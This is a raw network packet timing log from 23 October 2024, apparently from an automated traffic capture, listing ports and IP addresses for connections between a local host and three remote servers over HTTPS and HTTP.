Oct 23, 2024 08:15:00.212253094 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.212265015 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.212271929 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.212318897 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.212387085 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.245546103 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.245620012 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.245702982 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.245726109 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.245747089 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.245767117 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.245876074 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.245919943 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.245928049 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.247226000 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.247283936 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.247292042 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.247361898 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.247570992 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.247572899 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.247584105 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.247626066 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.247633934 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.247759104 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.247798920 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.247805119 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.247879982 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.247920990 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.247929096 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.248039961 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.248083115 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.248089075 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.248212099 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.248267889 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.248275995 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.248408079 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.248435974 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.248450994 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.248459101 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.248498917 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.248663902 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.248759031 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.248785019 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.248805046 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.248811007 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.248848915 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.290103912 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.290158987 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.290184021 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.290249109 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.290262938 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.290302992 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.290306091 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.290319920 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.290448904 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.290473938 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.290477991 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.290488958 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.290522099 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.290659904 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.290702105 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.290709019 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.290817976 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.290982008 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.291004896 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.291012049 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.291045904 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.291052103 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.291062117 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.291161060 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.294063091 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:16.396816969 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:16.402997971 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:16.403181076 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:16.403307915 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:16.409274101 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.064065933 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.064143896 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.064153910 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.064184904 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.064199924 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.064248085 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.064249039 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.064295053 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.064316034 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.064332962 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.064446926 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.064459085 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.064471006 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.064486980 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.064519882 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.070723057 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.070775986 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.070786953 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.070812941 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.111145973 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.181159019 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.181190014 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.181235075 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.181271076 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.181303024 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.181477070 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.181524992 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.181525946 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.181540966 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.181585073 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.181629896 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.181670904 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.182185888 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.182252884 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.182269096 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.182324886 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.182370901 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.183026075 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.183070898 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.183137894 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.183160067 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.298369884 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.298428059 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.298449993 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.298558950 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.298564911 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.298619032 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.298634052 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.298784971 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.299000978 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.299060106 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.299145937 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.448471069 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.448540926 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.448559999 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.448637009 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.448652983 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.448671103 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.448793888 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.448885918 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.448956966 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.448996067 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.449012995 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.449084997 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.449090958 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.449107885 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.449188948 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.449819088 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.449892998 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.449908972 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.449966908 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.449979067 CEST	80	49913	172.245.135.166	192.168.2.10
Oct 23, 2024 08:15:17.450046062 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:17.504733086 CEST	49913	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:15:41.790525913 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:41.796224117 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:41.796312094 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:41.796554089 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:41.796554089 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:41.801852942 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:41.801975012 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.990777969 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.990807056 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.990824938 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.990854025 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:42.991014957 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.991033077 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.991049051 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.991059065 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:42.991091013 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:42.991108894 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.991153955 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.991170883 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.991174936 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.991211891 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:42.991239071 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:42.996273994 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.996293068 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.996313095 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:42.996345043 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.111208916 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.138416052 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.138432980 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.138444901 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.138499975 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.138520002 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.138566971 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.138601065 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.138756990 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.138767004 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.138804913 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.139157057 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.139168978 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.139178991 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.139213085 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.139238119 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.139455080 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.139467001 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.139508009 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.139579058 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.139918089 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.139929056 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.139940023 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.139969110 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.139995098 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.255863905 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.255880117 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.255891085 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.255935907 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.255981922 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.255990982 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.256031036 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.256164074 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.256174088 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.256238937 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.256589890 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.256599903 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.256616116 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.256643057 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.256659985 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.256714106 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.256789923 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.256803036 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.256839037 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.257157087 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.257167101 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.257175922 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.257206917 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.257230997 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.287322998 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.373433113 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.373450041 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.373517990 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.373527050 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.373531103 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.373543978 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.373574972 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.373588085 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.373709917 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.374208927 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.374217987 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.374232054 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.374259949 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.374281883 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.374315977 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.374329090 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.374341011 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.374370098 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.374718904 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.374751091 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.374763012 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.374792099 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.374814987 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.453075886 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.453092098 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.453150034 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.490861893 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.490894079 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.490915060 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.490994930 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.491002083 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.491041899 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.491429090 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.491458893 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.491543055 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.491575956 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.491586924 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.491589069 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.491614103 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.491878033 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.491920948 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.491942883 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.491955042 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.492000103 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.492229939 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.492295027 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.492307901 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.492410898 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.492444992 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.495862007 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.570697069 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.570720911 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.570785046 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.608279943 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.608338118 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.608354092 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.608407021 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.608896971 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.608941078 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.608957052 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.608957052 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.609000921 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.609075069 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.609100103 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.609144926 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.609270096 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.609317064 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.609330893 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.609590054 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.609628916 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.609673977 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.609689951 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.609705925 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.609750986 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.609790087 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.609807014 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.609848976 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.688925982 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.688961029 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.689035892 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.725723028 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.725773096 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.725789070 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.725841045 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.726310968 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.726361036 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.726402998 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.726407051 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.726428986 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.726465940 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.726635933 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.726696014 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.726712942 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.726738930 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.726749897 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.726762056 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.727119923 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.727183104 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.727201939 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.727225065 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.727250099 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.727320910 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.727336884 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.727351904 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.727371931 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.843339920 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.843393087 CEST	80	49980	45.91.8.152	192.168.2.10
